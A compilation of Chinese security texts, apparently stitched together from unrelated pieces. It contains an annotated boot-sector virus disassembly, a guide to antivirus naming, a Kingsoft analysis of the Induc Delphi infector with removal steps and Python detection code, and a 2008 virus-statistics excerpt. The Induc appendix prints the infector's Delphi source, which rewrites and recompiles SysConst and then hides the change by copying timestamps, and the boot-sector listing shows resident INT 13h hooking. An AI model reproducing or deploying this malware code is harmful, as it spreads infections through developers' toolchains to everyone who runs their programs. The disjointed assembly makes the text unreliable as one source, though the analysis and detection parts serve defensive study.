What Is a Source Code Virus?
A source-code virus targets programs written in a high-level language. The virus code is inserted into the source before the program is compiled, so that after a successful build it is part of the legitimate program and is carried by every copy of that program.
Source virus
- Chinese name: Source virus
- Category: source-level virus that attacks programs written in a high-level language
- Effect: becomes part of a legitimate program after successful compilation
Virus introduction:

This is a typical boot-sector virus; its exact name has been forgotten. Judging by the technique it uses, it looks somewhat like the "6.4" virus (if any expert recognizes it, please advise).
Virus analysis:

```asm
; =======================================================
; The sector is loaded by the BIOS at 0000:7C00.  The byte at 0000:7C0B is
; the drive flag: 80h means the virus booted from the hard disk.
; Data area 7C02-7C1D: [7C03] last tick-count byte seen by the INT 13h hook,
; [7C07] original INT 13h vector, [7C0B] drive flag.
; =======================================================
0000:7C00 EB1C          JMP   7C1E
0000:7C02 00 00 00 00 00 00-00 00 00 80 00 00 00 00   ..............
0000:7C10 00 00 00 00 00 00 00 00-00 00 00 00 00 00   ..............
; --- set up a stack at 0000:7C00 and save the original INT 13h vector ---
0000:7C1E FA            CLI
0000:7C1F 33C0          XOR   AX,AX
0000:7C21 8ED8          MOV   DS,AX
0000:7C23 8ED0          MOV   SS,AX
0000:7C25 BC007C        MOV   SP,7C00
0000:7C28 FB            STI
0000:7C29 8BF4          MOV   SI,SP                   ; SI = 7C00, source for the copy below
0000:7C2B C4064C00      LES   AX,[004C]               ; INT 13h vector (0000:004C)
0000:7C2F A3077C        MOV   [7C07],AX
0000:7C32 8C06097C      MOV   [7C09],ES
; --- take 2 KB off the BIOS memory-size word (0040:0013) and copy the sector there ---
0000:7C36 A11304        MOV   AX,[0413]               ; memory size in KB
0000:7C39 48            DEC   AX
0000:7C3A 48            DEC   AX
0000:7C3B A31304        MOV   [0413],AX
0000:7C3E B106          MOV   CL,06
0000:7C40 D3E0          SHL   AX,CL                   ; KB -> paragraph (segment)
0000:7C42 8EC0          MOV   ES,AX
0000:7C44 B90002        MOV   CX,0200                 ; 512 bytes
0000:7C47 33FF          XOR   DI,DI
0000:7C49 FC            CLD
0000:7C4A F3            REPZ
0000:7C4B A4            MOVSB
0000:7C4C B88800        MOV   AX,0088
0000:7C4F 06            PUSH  ES
0000:7C50 50            PUSH  AX
0000:7C51 CB            RETF                          ; continue at offset 0088 in the high copy
; =======================================================
; Virus INT 13h handler (installed at CS:0052 before booting on)
; =======================================================
0000:7C52 1E            PUSH  DS
0000:7C53 50            PUSH  AX
0000:7C54 F6C2F0        TEST  DL,F0                   ; drive number >= 10h: not a floppy, pass through
0000:7C57 7528          JNZ   7C81
0000:7C59 D0EC          SHR   AH,1
0000:7C5B FECC          DEC   AH                      ; zero only for AH = 2 or 3 (read/write sector)
0000:7C5D 7522          JNZ   7C81
0000:7C5F 33C0          XOR   AX,AX
0000:7C61 8ED8          MOV   DS,AX
0000:7C63 A16C04        MOV   AX,[046C]               ; BIOS tick count (0040:006C)
0000:7C66 8AC4          MOV   AL,AH
0000:7C68 2E            CS:
0000:7C69 2A060300      SUB   AL,[0003]               ; minus the value seen last time
0000:7C6D 3C02          CMP   AL,02                   ; fewer than 2*256 ticks (about 28 s): pass through
0000:7C6F 7210          JB    7C81
0000:7C71 2E            CS:
0000:7C72 88260300      MOV   [0003],AH
0000:7C76 3D0200        CMP   AX,0002
0000:7C79 7303          JNB   7C7E
0000:7C7B E8CC00        CALL  7D4A                    ; routine not included in this listing
0000:7C7E E8E800        CALL  7D69                    ; routine not included in this listing
0000:7C81 58            POP   AX
0000:7C82 1F            POP   DS
0000:7C83 2E            CS:
0000:7C84 FF2E0700      JMP   FAR [0007]              ; chain to the original INT 13h
; =======================================================
; Executed in the high-memory copy (offsets below are relative to that segment)
; =======================================================
0000:7C88 33C0          XOR   AX,AX
0000:7C8A 8EC0          MOV   ES,AX
0000:7C8C CD13          INT   13                      ; AH = 0: reset disk system
0000:7C8E 0E            PUSH  CS
0000:7C8F 1F            POP   DS
0000:7C90 803E0B0000    CMP   BYTE PTR [000B],00      ; drive flag: 0 = floppy boot
0000:7C95 7424          JZ    7CBB
; =======================================================
; Hard disk: find the active partition and load its boot sector
; =======================================================
0000:7C97 BEAE01        MOV   SI,01AE                 ; 01BE - 10h: partition table minus one entry
0000:7C9A 83C610        ADD   SI,+10
0000:7C9D 803C80        CMP   BYTE PTR [SI],80        ; boot indicator set?
0000:7CA0 75F8          JNZ   7C9A
0000:7CA2 8B14          MOV   DX,[SI]                 ; DL = 80h (boot flag doubles as drive), DH = head
0000:7CA4 8B4C02        MOV   CX,[SI+02]              ; start sector/cylinder, already in INT 13h layout
0000:7CA7 BB007C        MOV   BX,7C00
0000:7CAA B80102        MOV   AX,0201                 ; read 1 sector to 0000:7C00
0000:7CAD CD13          INT   13
0000:7CAF 72D7          JB    7C88                    ; on error, reset and retry
0000:7CB1 2E            CS:
0000:7CB2 C7064801C007  MOV   WORD PTR [0148],07C0    ; segment word of the far JMP at 7D45 -> 07C0:0000
0000:7CB8 EB7B          JMP   7D35
; =======================================================
; Floppy: load the system from the diskette using the BPB fields at 0011h-001Ah
; =======================================================
0000:7CBA 90            NOP
0000:7CBB B280          MOV   DL,80
0000:7CBD E8A900        CALL  7D69                    ; routine not included in this listing, called with DL = 80h
0000:7CC0 BF1800        MOV   DI,0018                 ; DI -> sectors per track
0000:7CC3 8B45F9        MOV   AX,[DI-07]              ; [0011] root directory entries
0000:7CC6 B90400        MOV   CX,0004
0000:7CC9 D3E8          SHR   AX,CL                   ; / 16 = root directory sectors
0000:7CCB 8BE8          MOV   BP,AX
0000:7CCD 8B45FE        MOV   AX,[DI-02]              ; [0016] sectors per FAT
0000:7CD0 D1E0          SHL   AX,1                    ; two FATs
0000:7CD2 40            INC   AX                      ; plus the boot sector = first root dir sector
0000:7CD3 03E8          ADD   BP,AX                   ; BP = first data sector
0000:7CD5 F635          DIV   BYTE PTR [DI]           ; sector number / sectors per track
0000:7CD7 8ACC          MOV   CL,AH
0000:7CD9 FEC1          INC   CL                      ; sector (1-based)
0000:7CDB 33D2          XOR   DX,DX
0000:7CDD 8AF0          MOV   DH,AL                   ; head
0000:7CDF BB0005        MOV   BX,0500
0000:7CE2 B80102        MOV   AX,0201                 ; read root directory sector to 0000:0500
0000:7CE5 CD13          INT   13
0000:7CE7 72F9          JB    7CE2                    ; retry on error
0000:7CE9 8BC5          MOV   AX,BP
0000:7CEB BE3400        MOV   SI,0034                 ; sector count for the loop below
0000:7CEE B707          MOV   BH,07                   ; load to 0000:0700 (= 0070:0000)
0000:7CF0 F635          DIV   BYTE PTR [DI]
0000:7CF2 33C9          XOR   CX,CX
0000:7CF4 86E1          XCHG  AH,CL
0000:7CF6 2BF1          SUB   SI,CX
0000:7CF8 F67502        DIV   BYTE PTR [DI+02]        ; [001A] number of heads
0000:7CFB 8BD0          MOV   DX,AX
0000:7CFD 86D5          XCHG  DL,CH
0000:7CFF 8A05          MOV   AL,[DI]
0000:7D01 2AC1          SUB   AL,CL                   ; sectors left on this track
0000:7D03 FEC1          INC   CL
0000:7D05 B402          MOV   AH,02
0000:7D07 50            PUSH  AX
0000:7D08 CD13          INT   13
0000:7D0A 58            POP   AX
0000:7D0B 72F8          JB    7D05                    ; retry on error
0000:7D0D B101          MOV   CL,01
0000:7D0F 02F8          ADD   BH,AL                   ; advance buffer by AL * 512 bytes
0000:7D11 02F8          ADD   BH,AL
0000:7D13 8B05          MOV   AX,[DI]
0000:7D15 FEC6          INC   DH                      ; next head
0000:7D17 3A7502        CMP   DH,[DI+02]
0000:7D1A 7204          JB    7D20
0000:7D1C B600          MOV   DH,00
0000:7D1E FEC5          INC   CH                      ; next cylinder
0000:7D20 2BF0          SUB   SI,AX
0000:7D22 73E1          JNB   7D05
0000:7D24 03C6          ADD   AX,SI                   ; remaining sectors
0000:7D26 B402          MOV   AH,02
0000:7D28 CD13          INT   13
0000:7D2A 8A6DFD        MOV   CH,[DI-03]              ; [0015] media descriptor
0000:7D2D 8BDD          MOV   BX,BP
; =======================================================
; Target segment of the far jump below: 07C0 for hard disk (patched at 7CB2), 0070 for floppy
; =======================================================
0000:7D2F C70648017000  MOV   WORD PTR [0148],0070
; =======================================================
; Hook INT 13h and jump to the normal boot code
; =======================================================
0000:7D35 33C0          XOR   AX,AX
0000:7D37 A20B00        MOV   [000B],AL               ; clear the drive flag in the resident copy
0000:7D3A 8ED8          MOV   DS,AX
0000:7D3C B052          MOV   AL,52
0000:7D3E A34C00        MOV   [004C],AX               ; INT 13h offset = 0052 (handler above)
0000:7D41 8C0E4E00      MOV   [004E],CS               ; INT 13h segment = resident copy
0000:7D45 EA00007000    JMP   0070:0000               ; segment word at 7D48 patched at 7CB2 / 7D2F
; =======================================================
```

The bytes at 7C23-7C2B, 7C42, 7C97, 7CB8, 7CD5, 7CF0, 7CF8 and 7D17 were garbled in the transcript and have been decoded from the hex shown (8ED0 is MOV SS,AX, 8EC0 is MOV ES,AX, BEAE01 is MOV SI,01AE, EB7B from 7CB8 lands at 7D35, F635 is DIV BYTE PTR [DI], 3A7502 is CMP DH,[DI+02]). The routines at 7D4A and 7D69 are not part of the listing.
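As an added example, not part of the analysis above, the following Python reads a 512-byte boot sector the way the listing does: it maps the listing's 0000:XXXX addresses to offsets inside the sector, walks the partition table from offset 1BEh looking for the 80h boot indicator exactly as the loop at 7C97-7CA0 does, and matches the INT 13h hook prologue bytes shown at 7C52. The partition-table offset and the meaning of the boot indicator come from the MBR format; the sample MBR is constructed for the demonstration and is not the virus.

```python
"""Added example, not part of the original analysis: reading a 512-byte boot
sector the way the listed virus does.  The sample MBR built below is
constructed for the demonstration and is not the virus itself."""
import struct
from typing import Optional

LOAD_BASE = 0x7C00        # the BIOS loads the boot sector at 0000:7C00
PART_TABLE = 0x1BE        # first of the four 16-byte partition entries
ACTIVE = 0x80             # boot indicator the loop at 7C9D compares against

# INT 13h hook entry at 0000:7C52 in the listing:
#   PUSH DS / PUSH AX / TEST DL,F0 / JNZ / SHR AH,1 / DEC AH / JNZ
HOOK_PROLOGUE = bytes.fromhex("1E50F6C2F07528D0ECFECC7522")
HOOK_OFFSET = 0x7C52 - LOAD_BASE   # 0x52 inside the sector


def sector_offset(addr: int) -> int:
    """Map a 0000:XXXX address from the listing to an offset in the sector."""
    off = addr - LOAD_BASE
    if not 0 <= off < 512:
        raise ValueError(f"{addr:#06x} is outside the loaded sector")
    return off


def find_active_partition(sector: bytes) -> Optional[dict]:
    """Emulate 7C97-7CA4: SI = 01AEh, then ADD SI,10h and CMP BYTE PTR [SI],80h
    until the active entry is found.  The virus then does MOV DX,[SI] and
    MOV CX,[SI+2]: a partition entry starts with boot flag, head, sector,
    cylinder in exactly the INT 13h register layout, so DL becomes 80h (the
    first hard disk) and DH/CX the CHS start of the partition.  Unlike the
    virus, this stops after four entries instead of scanning past the table."""
    if len(sector) != 512:
        raise ValueError("expected a 512-byte sector")
    for i in range(4):
        off = PART_TABLE + 16 * i
        if sector[off] != ACTIVE:
            continue
        dx, cx = struct.unpack_from("<HH", sector, off)
        return {"index": i, "dl": dx & 0xFF, "dh": dx >> 8,
                "cl": cx & 0xFF, "ch": cx >> 8, "type": sector[off + 4]}
    return None


def hook_prologue_present(sector: bytes) -> bool:
    """True if the bytes at offset 52h match the handler prologue from the
    listing.  A literal pattern match for this one sample, not a general
    boot-virus detector."""
    return sector[HOOK_OFFSET:HOOK_OFFSET + len(HOOK_PROLOGUE)] == HOOK_PROLOGUE


def make_sample_mbr() -> bytes:
    """Constructed sample: an ordinary-looking MBR whose second entry is active."""
    s = bytearray(512)
    s[0:3] = b"\xEB\x3C\x90"                                # JMP SHORT +3Ch / NOP
    e0, e1 = PART_TABLE, PART_TABLE + 16
    s[e0:e0 + 5] = bytes([0x00, 0x00, 0x01, 0x00, 0x06])    # inactive entry
    s[e1:e1 + 5] = bytes([ACTIVE, 0x01, 0x01, 0x00, 0x07])  # active: head 1, sector 1, cyl 0
    s[510:512] = b"\x55\xAA"
    return bytes(s)
```

`sector_offset(0x7D48)` returns 0x148, which is why the two `MOV WORD PTR [0148],...` instructions in the listing rewrite the segment word of the far `JMP 0070:0000` at 7D45 (its opcode EA is followed by offset 0000 and then the segment at 7D48).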
Computer Virus Defense Handbook: how to read a virus name

When an antivirus program reports a detection, many people are baffled by the long name and ask: how am I supposed to know what this virus is? In fact, once you know the naming rules, the name shown in the scanner's report already tells you some general characteristics of the virus. With so many viruses in the world, anti-virus companies classify and name them by their characteristics for their own convenience. Each vendor's rules differ in detail, but they broadly follow one scheme. The general format is:

<virus prefix>.<virus name>.<virus suffix>

The virus prefix gives the type of the virus and separates the broad classes. Different types carry different prefixes: the common Trojan prefix is Trojan, the worm prefix is Worm, and so on.

The virus name identifies the family and is used to tell families apart. For example, every member of the well-known CIH family is named "CIH", and the recently rampant Sasser worm has the family name "Sasser".

The virus suffix identifies a variant within a family, usually as one of the 26 letters. Worm.Sasser.b, for instance, is variant B of the Sasser worm, usually referred to as "Sasser variant B" or "Sasser B". When a family has many variants (a sign of a tenacious virus ^_^), a mixture of digits and letters may be used for the variant identifier.

In summary, the prefix lets you quickly place a virus in a class and form a rough judgement (this presupposes some knowledge of the common classes, which is beyond this article); the name lets you look up detailed descriptions; the suffix tells you which variant is on your machine. Different vendors may give the same sample different names, so the class and the family are the parts worth relying on. Explanations of the common prefixes follow (for Windows, the system most of us use):

1. System viruses. Prefixes: Win32, PE, Win95, W32, W95, etc. These infect *.exe and *.dll files of the Windows operating system and spread through those files. Example: CIH.
2. Worms. Prefix: Worm. They spread through the network or through system vulnerabilities; most also send out infected e-mail and congest the network. Examples: Blaster (congests the network), Little Postman (Mimail, sends infected e-mail).
3. Trojan and hacker programs. The Trojan prefix is Trojan; hacker programs generally carry the prefix Hack. Trojans enter a system through the network or a vulnerability, hide, and leak the user's information to the outside; Hack programs have a graphical interface through which the attacker remotely controls the victim's computer. The two often come in pairs: the Trojan infects the victim's machine and the Hack program controls it through that Trojan, and the two types are increasingly merged. Examples: the QQ message-tail Trojan Trojan.QQ3344, and the online-game password stealers many users have met, such as Trojan.LMir.PSW.60. Note that PSW or PWD in a name generally means the virus steals passwords (both abbreviate "password"); a hacker program looks like Hack.Nether.Client.
4. Script viruses. Prefix: Script. Written in a scripting language and spread through web pages, for example Redlof (Script.Redlof). Script viruses may also carry a prefix naming the language, VBS or JS, for example Happy Time (VBS.Happytime) and Fortnight (Js.Fortnight.cs).
5. Macro viruses. Strictly a kind of script virus, but counted separately because of their special nature. The prefix is Macro and the second prefix is one of Word, Word97, Excel, Excel97 (possibly others): a virus that infects only Word 97 and earlier documents is named Macro.Word97.<name>; one that infects only documents of Word versions later than Word 97 is Macro.Word.<name>; likewise Macro.Excel97 and Macro.Excel for Excel files, and so on. They infect Office documents and spread through the Office global templates, for example Melissa.
6. Backdoors. Prefix: Backdoor. They spread via the network and open a back door on the system, creating a security risk for the user's computer, for example the IRC backdoor Backdoor.IRCBot that many users have encountered.
7. Droppers. Prefix: Dropper. When run, they release one or more new viruses from their body into the system directory, and those released viruses do the damage. Examples: the Glacier (BingHe) dropper Dropper.BingHe2.2C and the MSN shooter Dropper.Worm.Smibag.
8. Destructive programs. Prefix: Harm. An attractive icon entices the user to click; when clicked, the program directly damages the user's computer. Examples: Harm.formatC.f (formats drive C), Harm.Command.Killer.
9. Joke programs. Prefix: Joke, also called hoax viruses. The same lure; when clicked, they stage various "destructive" operations to frighten the user but in fact do no damage to the computer. Example: Joke.Girlghost.
10. Binders. Prefix: Binder. The author uses a binding tool to bundle the virus with an application such as QQ or IE. The result looks like a normal file; when the user runs it, the visible application runs while the bundled virus runs hidden and does its harm. Examples: Binder.QQPass.QQBin, Binder.killsys.

Those are the common prefixes. Some others turn up occasionally; briefly:
- DoS: performs a denial-of-service attack against a host or server;
- Exploit: automatically exploits a vulnerability in a remote system or in the local one to spread itself, or is itself an exploitation tool used for hacking;
- HackTool: a hacking tool that may not damage your own machine but lets others use it as a stepping stone to attack someone else.

After a detection, the rules above let you make a preliminary judgement about what you are dealing with. That knowledge is a great help when the antivirus program cannot clean the infection automatically.
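As an added example that is not part of the article, the following Python splits a detection name of the form <prefix>.<name>.<suffix> according to the conventions described above. The prefix table is the article's list; the sample names are the article's examples plus a constructed Macro.Word97.Melissa to exercise the two-level macro prefix.

```python
"""Added example, not part of the article: parse <prefix>.<name>.<suffix>
detection names using the conventions the article lists."""
from dataclasses import dataclass
from typing import Optional

# prefix -> class, as listed in the article
PREFIX_CLASSES = {
    "Win32": "system virus", "PE": "system virus", "Win95": "system virus",
    "W32": "system virus", "W95": "system virus",
    "Worm": "worm",
    "Trojan": "trojan", "Hack": "hacker program",
    "Script": "script virus", "VBS": "script virus (VBScript)",
    "JS": "script virus (JavaScript)",
    "Macro": "macro virus",
    "Backdoor": "backdoor", "Dropper": "dropper",
    "Harm": "destructive program", "Joke": "joke/hoax", "Binder": "binder",
    "DoS": "denial-of-service tool", "Exploit": "exploit",
    "HackTool": "hacking tool",
}
MACRO_HOSTS = ("Word", "Word97", "Excel", "Excel97")   # second-level macro prefixes
PASSWORD_MARKERS = ("PSW", "PWD")                      # password-stealer marker
_LOWER = {k.lower(): k for k in PREFIX_CLASSES}        # vendors differ in case (Js vs JS)


@dataclass
class VirusName:
    raw: str
    prefix: str
    category: str
    family: str
    variant: Optional[str]
    steals_passwords: bool
    macro_host: Optional[str] = None


def parse_virus_name(name: str) -> VirusName:
    """Split a detection name into prefix, family and variant.

    Handles the variations the article shows: a bare <prefix>.<name> with no
    variant (Backdoor.IRCBot), a PSW/PWD marker between name and variant
    (Trojan.LMir.PSW.60), the two-level macro prefix (Macro.Word97.<name>),
    and prefixes whose case differs between vendors (Js.Fortnight.cs).
    """
    parts = [p for p in name.strip().split(".") if p]
    if len(parts) < 2:
        raise ValueError(f"need at least <prefix>.<name>: {name!r}")
    prefix = _LOWER.get(parts[0].lower(), parts[0])
    category = PREFIX_CLASSES.get(prefix, "unknown prefix")
    rest = parts[1:]
    macro_host = None
    if prefix == "Macro" and rest[0] in MACRO_HOSTS:
        macro_host = rest.pop(0)
        if not rest:
            raise ValueError(f"macro name without a family: {name!r}")
    family, tail = rest[0], rest[1:]
    steals = any(t.upper() in PASSWORD_MARKERS for t in tail)
    tail = [t for t in tail if t.upper() not in PASSWORD_MARKERS]
    variant = tail[-1] if tail else None
    return VirusName(name, prefix, category, family, variant, steals, macro_host)
```

Anything after the family that is not a PSW/PWD marker is treated as the variant suffix, so Hack.Nether.Client yields the suffix "Client"; the article's rules do not define a separate role for that position.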
Kingsoft Cloud Security Center recently intercepted a virus aimed at programmers, in particular Delphi users, nicknamed the "Delphi nightmare" (Win32.Induc.b.820224). In brief: it infects the Delphi installation itself, and once that has succeeded, every program the programmer subsequently compiles carries the virus.

The following is the analysis of the Virus.Win32.Induc.a infector by the Kingsoft Internet Security analysis group:

1. File information
- File size: 163840 bytes
- Packer: ASPack 2.12
- Language: Borland Delphi 6.0
- Virus type: infector

2. Virus description

This sample is a Delphi infector. It infects the SysConst.dcu file in the Delphi library directory, so that every program the user subsequently compiles against the infected library is itself infected.
3. Virus behavior

- The virus body runs when the program processes its initialization table for the Nth time (the call to StartExe), that is, before the normal Delphi initialization code (N depends on the Delphi version used to build the infected program).
- It loops over the registry keys HKLM\Software\Borland\Delphi\X.0 for X = 4, 5, 6, 7 to determine whether Delphi is installed on the machine. If it is not, the virus code is skipped and normal initialization continues without infection.
- If Delphi is installed, it reads the installation path (RootDir) from the registry.
- From that path it locates SysConst.pas in the source folder and SysConst.dcu in the library folder, i.e. %DelphiInstallPath%\Source\Rtl\Sys\SysConst.pas and %DelphiInstallPath%\Lib\SysConst.dcu, and moves the original SysConst.dcu aside as SysConst.bak.
- It writes a copy of SysConst.pas with the virus's Delphi source appended into the library folder.
- It calls %DelphiInstallPath%\Bin\dcc32.exe to compile the infected SysConst.pas into a new SysConst.dcu in Lib, replacing the original.
- The original SysConst.pas is left untouched and the infected .pas copy is deleted, so only the compiled .dcu differs.
- The timestamps of the replaced SysConst.dcu are set to match the original, so it does not stand out among the other library files.

4. Degree of harm

The virus carries no destructive payload; its only effect is that every program built with the modified library contains the infection code described above. Because the infection happens in the Delphi library, infected files differ in size and in packing, and the size and packer of this analysis sample are not representative.
5. Solutions

This virus re-infects: any Delphi program you have compiled can infect the Delphi library files on your machine again. To remove it completely:

1. Do not run any program written in Delphi.
2. Scan all Delphi-built executables with an antivirus product and clean them (or delete every Delphi executable, including those downloaded from the Internet).
3. Delete %DelphiInstallPath%\Lib\SysConst.dcu, then do step 4, or steps 5 and 6.
4. Rename %DelphiInstallPath%\Lib\SysConst.bak to SysConst.dcu; done. (The .bak is the clean original the virus moved aside, so this only applies when it is present.)
5. Otherwise rebuild SysConst.dcu with dcc32: %DelphiInstallPath%\Bin\DCC32.exe "%DelphiInstallPath%\Source\Rtl\Sys\SysConst.pas". The virus leaves the source file intact, so the rebuilt unit is clean.
6. Copy the newly compiled SysConst.dcu (in %DelphiInstallPath%\Source\Rtl\Sys) into %DelphiInstallPath%\Lib; done.
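As an added example, not Kingsoft's code, the following Python turns the behavior analysis and the cleanup steps above into checks: a string heuristic over an unpacked Delphi executable for the literals the infection routine carries (the registry path it probes, the unit it rewrites, the compiler it invokes; all three appear in the appended source), a check of a Delphi installation's Lib folder for the SysConst.bak the infector leaves beside SysConst.dcu and the copied timestamps, and the restore of steps 3 and 4. It assumes the Lib\SysConst.dcu layout stated in the analysis; the sample bytes and the fake Delphi directory built in demo_scenario() are constructed.

```python
"""Added example (not Kingsoft's code): checks derived from the Induc analysis.
Assumes the <root>\\Lib\\SysConst.dcu layout the analysis describes; the
indicator strings are the literals visible in the appended source.  The
fixture in demo_scenario() is constructed."""
import os
import shutil
import tempfile
from pathlib import Path

# Literals the infection routine needs at run time; they also sit inside the
# sc[] array of the dropped source, so they survive compilation.
INDICATORS = (b"Software\\Borland\\Delphi\\", b"SysConst", b"dcc32.exe")


def induc_string_indicators(data: bytes) -> dict:
    """Report which indicator strings occur in a binary image.
    Only meaningful on an UNPACKED file: the Kingsoft sample was ASPack'd and a
    packed image hides these strings.  All three together is a strong hint,
    not proof (an IDE add-on could legitimately contain them)."""
    found = {s.decode(): (s in data) for s in INDICATORS}
    return {"found": found, "suspicious": all(found.values())}


def check_delphi_lib(root: Path) -> dict:
    """Look in <root>/Lib for the traces the infector leaves: SysConst.bak
    (the clean original it moved aside) next to SysConst.dcu, and identical
    modification times on both (it copies them with SetFileTime)."""
    lib = Path(root) / "Lib"
    dcu, bak = lib / "SysConst.dcu", lib / "SysConst.bak"
    result = {"dcu_present": dcu.exists(), "bak_present": bak.exists(),
              "timestamps_match": False}
    if result["dcu_present"] and result["bak_present"]:
        result["timestamps_match"] = dcu.stat().st_mtime_ns == bak.stat().st_mtime_ns
    return result


def restore_from_backup(root: Path, dry_run: bool = True) -> list:
    """Cleanup steps 3 and 4: delete Lib/SysConst.dcu and rename SysConst.bak
    back to SysConst.dcu.  With dry_run the planned actions are returned and
    nothing is touched."""
    lib = Path(root) / "Lib"
    dcu, bak = lib / "SysConst.dcu", lib / "SysConst.bak"
    if not bak.exists():
        raise FileNotFoundError(
            f"{bak} missing: recompile SysConst.pas with dcc32 instead (steps 5 and 6)")
    actions = [f"delete {dcu}", f"rename {bak} -> {dcu}"]
    if not dry_run:
        if dcu.exists():
            dcu.unlink()
        bak.rename(dcu)
    return actions


def demo_scenario() -> dict:
    """Constructed fixture: a fake Delphi root with an 'infected' Lib as the
    analysis describes it, run through the checks and the restore."""
    root = Path(tempfile.mkdtemp(prefix="delphi_"))
    lib = root / "Lib"
    lib.mkdir()
    (lib / "SysConst.bak").write_bytes(b"CLEAN-DCU")
    (lib / "SysConst.dcu").write_bytes(b"INFECTED-DCU" + b"".join(INDICATORS))
    # mimic SetFileTime copying the backup's times onto the rebuilt .dcu
    st = (lib / "SysConst.bak").stat()
    os.utime(lib / "SysConst.dcu", ns=(st.st_atime_ns, st.st_mtime_ns))
    before = check_delphi_lib(root)
    scan = induc_string_indicators((lib / "SysConst.dcu").read_bytes())
    restore_from_backup(root, dry_run=False)
    after = check_delphi_lib(root)
    restored = (lib / "SysConst.dcu").read_bytes()
    shutil.rmtree(root, ignore_errors=True)
    return {"before": before, "scan": scan, "after": after, "restored": restored}
```

On a real installation run check_delphi_lib on the RootDir value read from HKLM\Software\Borland\Delphi\X.0, and scan the compiled executables only after unpacking them; restore_from_backup is deliberately a dry run unless told otherwise.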
Appendix (Delphi source code)

```pascal
{ Delphi source carried by the infector, as given in the analysis.  Quote
  characters appear as $ because this is the text held in the sc[] array;
  x() turns each $ back into ' when the code is written into SysConst.pas.
  Backslashes in paths were lost in extraction and are restored here. }
uses windows;

var sc: array[1..24] of string = (
  { the 24 string constants, this program's own lines with ' written as $,
    are not reproduced on the page }
);

{ replace the $ placeholder (#36) with the quote character (#39) }
function x(s: string): string;
var i: integer;
begin
  for i := 1 to length(s) do
    if s[i] = #36 then
      s[i] := #39;
  result := s;
end;

{ s: path of Source\Rtl\Sys\SysConst.pas; d: Lib\sysconst. (extension appended);
  e: quoted path of Bin\dcc32.exe }
procedure re(s, d, e: string);
var f1, f2: textfile;
    h: cardinal;
    f: STARTUPINFO;
    p: PROCESS_INFORMATION;
    b: boolean;
    t1, t2, t3: FILETIME;
begin
  { Lib\sysconst.bak already present: this installation was infected before }
  h := CreateFile(pchar(d + $bak$), 0, 0, 0, 3, 0, 0);   { 3 = OPEN_EXISTING }
  if h <> DWORD(-1) then begin
    CloseHandle(h);
    exit;
  end;
  assignfile(f1, s);
  reset(f1);
  if ioresult <> 0 then
    exit;
  assignfile(f2, d + $pas$);          { Lib\sysconst.pas, the rewritten unit }
  rewrite(f2);
  if ioresult <> 0 then begin
    closefile(f1);
    exit;
  end;
  { copy the original unit up to and including the 'implementation' line }
  while not eof(f1) do begin
    readln(f1, s);
    writeln(f2, s);
    if pos($implementation$, s) <> 0 then
      break;
  end;
  { emit the infector: its own source as the sc[] array, then the code }
  for h := 1 to 1 do
    writeln(f2, sc[h]);
  for h := 2 to 23 do
    writeln(f2, $$$$ + sc[h] + $$$,$);
  writeln(f2, $$$$ + sc[24] + $$$);$);
  for h := 2 to 24 do
    writeln(f2, x(sc[h]));
  closefile(f1);
  closefile(f2);
  { move the clean .dcu aside and compile the rewritten unit in its place }
  MoveFile(pchar(d + $dcu$), pchar(d + $bak$));
  fillchar(f, sizeof(f), 0);
  f.cb := sizeof(f);
  f.dwFlags := STARTF_USESHOWWINDOW;
  f.wShowWindow := SW_HIDE;
  b := CreateProcess(nil, pchar(e + $ "$ + d + $pas"$), 0, 0, false, 0, 0, 0, f, p);
  if b then
    WaitForSingleObject(p.hProcess, INFINITE);
  { MoveFile fails when the new .dcu exists, so this restores the original
    only if compilation produced nothing }
  MoveFile(pchar(d + $bak$), pchar(d + $dcu$));
  DeleteFile(pchar(d + $pas$));
  { copy the backup's timestamps onto the new .dcu }
  h := CreateFile(pchar(d + $bak$), 0, 0, 0, 3, 0, 0);
  if h = DWORD(-1) then
    exit;
  GetFileTime(h, @t1, @t2, @t3);
  CloseHandle(h);
  h := CreateFile(pchar(d + $dcu$), 256, 0, 0, 3, 0, 0);   { 256 = FILE_WRITE_ATTRIBUTES }
  if h = DWORD(-1) then
    exit;
  SetFileTime(h, @t1, @t2, @t3);
  CloseHandle(h);
end;

{ look for Delphi 4.0 to 7.0 in the registry and infect each installation }
procedure st;
var k: HKEY;
    c: array[1..255] of char;
    i: cardinal;
    r: string;
    v: char;
begin
  for v := $4$ to $7$ do
    if RegOpenKeyEx(HKEY_LOCAL_MACHINE, pchar($Software\Borland\Delphi\$ + v + $.0$), 0, KEY_READ, k) = 0 then begin
      i := 255;
      if RegQueryValueEx(k, $RootDir$, nil, @i, @c, @i) = 0 then begin
        r := $$;
        i := 1;
        while c[i] <> #0 do begin
          r := r + c[i];
          inc(i);
        end;
        re(r + $\source\rtl\sys\SysConst$ + $.pas$, r + $\lib\sysconst.$, $"$ + r + $\bin\dcc32.exe"$);
      end;
      RegCloseKey(k);
    end;
end;

{ appended to SysConst.pas after 'implementation', this becomes the unit's
  initialization section, which is why it runs before the host program }
begin
  st;
end.
```
The data in the "2008 China Computer Virus Epidemic and Internet Security Report" were monitored jointly by the Kingsoft Internet Security Monitoring Center, the Kingsoft Internet Security Center, the Kingsoft Global Virus Emergency Response Center and the Kingsoft Internet Security Customer Service Center. All conclusions and opinions in the report are released solely by Kingsoft and are independent of the cooperating companies and departments. Both you and Kingsoft acknowledge that the emergence and spread of viruses, Trojans and other malicious programs are uncontrollable and unpredictable; Kingsoft therefore vouches only for data within its control and within the limits of its technical capability, gives no guarantee regarding viruses, Trojans or malicious programs it has not yet brought under control, and undertakes to keep improving its technical capability and extending its coverage. You acknowledge this and undertake not to make claims against Kingsoft for any consequences of relying on or using this report.
In 2008 the number of new computer viruses and Trojans in China exploded, passing ten million in total. Modular virus production, specialization of virus production, and the move of the virus "business model" onto the Internet were the three salient features of virus development in China in 2008. The profit motive of virus writers did not change: trojaned web pages and vulnerability exploitation became the main channels through which attackers made money.

1. Overall situation of computer viruses and Trojans in China in 2008

New viruses and Trojans grew geometrically in 2008. According to Kingsoft Internet Security Center monitoring data, Kingsoft Internet Security intercepted 13,997,717 new viruses and Trojans in 2008, a 48-fold increase over 2007.

Of these, new Trojans numbered 7,801,911, or 56.13% of the year's total; the hacker-tool category made up 21.97%; and the share of one further class rose from 0.8% in 2007 to 5.96%, the fastest growth of any class. Kingsoft Security Center statistics show that 90% of infections came from web pages implanted with malware. According to Kingsoft Internet Security Center, 69,738,785 computers nationwide were infected in 2008, 40% more than in 2007.